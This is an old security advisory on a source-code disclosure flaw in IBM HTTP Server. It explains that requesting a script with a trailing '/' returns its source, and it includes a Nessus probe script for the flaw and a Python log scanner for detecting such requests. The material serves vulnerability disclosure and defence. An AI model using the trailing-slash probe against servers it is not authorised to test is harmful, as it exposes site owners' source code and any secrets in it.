
IBM HTTP Server Source Code Disclosure Issue


Published: 2001-11-12
Updated: 2001-11-12
Severity:
Threat level: remote unauthorized file access
Error type: input validation error
Exploitation method: server mode

Affected systems
IBM HTTP Server 1.3.3 win32
IBM HTTP Server 1.3.6 win32
IBM HTTP Server 1.3.6.4 win32
IBM HTTP Server 1.3.6.3
   - Caldera OpenLinux 2.2
   - IBM AIX 4.2.1
   - Microsoft Windows NT 4.0
   - RedHat Linux 5.2 sparc
   - RedHat Linux 6.0 sparc
   - S.u.S.E. Linux 6.0
   - S.u.S.E. Linux 6.1
   - Sun Solaris 2.6
   - TurboLinux Turbo Linux 3.0.1
IBM HTTP Server 1.3.6.2 win32
IBM HTTP Server 1.3.6.2 unix
IBM HTTP Server 1.3.12.4
   - IBM AIX 4.3.3
   - IBM AIX 5.1
   - RedHat Linux 7.1
   - S.u.S.E. Linux 7.2
IBM HTTP Server 1.3.12.3
   - HP HP-UX 11.0
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6a
   - Sun Solaris 2.6
   - Sun Solaris 7.0
   - Sun Solaris 8.0
IBM HTTP Server 1.3.12.2
   - Caldera OpenLinux 2.3
   - Caldera OpenLinux 2.4
   - HP HP-UX 11.0
   - IBM AIX 4.3.3
   - Microsoft Windows NT 4.0
   - RedHat Linux 6.2 sparc
   - Sun Solaris 2.6
   - TurboLinux Turbo Linux 6.0
IBM HTTP Server 1.3.19
   - HP HP-UX 11.0
   - IBM AIX 4.3.3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6a
   - RedHat Linux 7.1
   - S.u.S.E. Linux 7.1
   - Sun Solaris 2.6
   - Sun Solaris 7.0
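Detailed description
An input validation error in IBM HTTP Server on the AS/400 allows a remote attacker to send a specially crafted web request that discloses source code.

Appending "/" to a request for an existing script causes the script's source code to be disclosed.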

Test code
#
# ibm_server_code.nasl script was written by Felix Huber <huberfelix@webtopia.de>
#
# v. 1.00 (last update 08.11.01)

if(description)
{
script_id(?????????);
name["english"] = "IBM-HTTP-Server View Code";
script_name(english:name["english"]);

desc["english"] = "
IBM's HTTP Server on the AS/400 platform is vulnerable to an attack
that will show the source code of the page -- such as an .html or .jsp
page -- by attaching an '/' to the end of a URL.

Example:
http://www.foo.com/getsource.jsp/

Solution :  Not yet


Risk factor : High";


script_description(english:desc["english"]);

summary["english"] = "IBM-HTTP-Server View Code";

script_summary(english:summary["english"]);

script_category(ACT_GATHER_INFO);


script_copyright(english:"This script is Copyright (C) 2001 Felix Huber");
family["english"] = "CGI abuses";
script_family(english:family["english"]);
script_dependencie("find_service.nes");
script_dependencie("httpver.nasl");
script_require_ports("Services/www", 80);
exit(0);
}

#
# The script code starts here
#

port = get_kb_item("Services/www");
if(!port)port = 80;

dir[0] = "/index.html";
dir[1] = "/index.htm";
dir[2] = "/index.jsp";
dir[3] = "/default.html";
dir[4] = "/default.htm";
dir[5] = "/default.jsp";
dir[6] = "/home.html";
dir[7] = "/home.htm";
dir[8] = "/home.jsp";

# Only probe if the web port is open
if(get_port_state(port))
{
  for (i = 0; dir[i]; i = i + 1)
  {
    soc = http_open_socket(port);
    if(soc)
    {
      # Request each candidate page with a trailing "/" appended
      url = string(dir[i], "/");

      req = http_get(item:url, port:port);
      send(socket:soc, data:req);
      r = recv(socket:soc, length:409600);
      close(soc);

      #display(r);

      # Report when an IBM HTTP Server answers with the
      # www/unknown content type
      if("Server: IBM-HTTP-Server/1.0" >< r)
      {
        if("Content-Type: www/unknown" >< r)
        {
          #security_hole(port);
          display("Security Hole detected\n");
          exit(0);
        }
      }
    }
  }
}

Solution
None yet
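
With no fix available, access logs can be reviewed for the request shape described above. The following is an added example, not part of the original advisory or of IBM's software: it flags successful requests whose path is a page name followed by "/". It assumes the server writes Common Log Format; the function name, extension list and sample log lines are constructed for illustration.

```python
import re

# Assumed log layout (Common Log Format):
#   host ident user [time] "METHOD target PROTO" status bytes
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) \S+'
)

# Page extensions to watch; the advisory names .html and .jsp, and the
# test script also probes .htm.
PAGE_EXTENSIONS = (".jsp", ".html", ".htm")


def trailing_slash_page_hits(lines, extensions=PAGE_EXTENSIONS):
    """Return (host, path) for 200 responses to '<page>.<ext>/' requests."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if m is None or m.group("status") != "200":
            continue  # unparsable line, or the server did not serve content
        path = m.group("target").split("?", 1)[0]  # drop any query string
        if not path.endswith("/"):
            continue
        # Last path segment once the trailing slash(es) are removed.
        last_segment = path.rstrip("/").rsplit("/", 1)[-1].lower()
        if last_segment.endswith(extensions):
            hits.append((m.group("host"), path))
    return hits


# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Nov/2001:10:00:01 +0000] "GET /index.jsp HTTP/1.0" 200 512',
    '192.0.2.44 - - [12/Nov/2001:10:00:05 +0000] "GET /getsource.jsp/ HTTP/1.0" 200 4096',
    '192.0.2.44 - - [12/Nov/2001:10:00:06 +0000] "GET /docs/ HTTP/1.0" 200 1024',
    '192.0.2.45 - - [12/Nov/2001:10:00:09 +0000] "GET /default.htm/ HTTP/1.0" 404 210',
    '192.0.2.51 - - [12/Nov/2001:10:01:30 +0000] "GET /app/index.jsp/?id=7 HTTP/1.0" 200 3000',
    'truncated or malformed line',
]

if __name__ == "__main__":
    for host, path in trailing_slash_page_hits(SAMPLE_LOG):
        print(f"review: {host} received 200 for {path}")
```

A hit means the request matched the pattern and was answered with 200; whether source was actually returned still has to be confirmed from the response itself.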

Related information
"'ken'@FTU" <franklin_tech_bulletins@yahoo.com>
Reference: http://www.securityfocus.com/archive/1/LEEPKOFKPCPHJMIIKFGJEENLCBAA.smiler@vxd.org
Vendor homepage: http://www-4.ibm.com/software/webservers/httpservers/download.html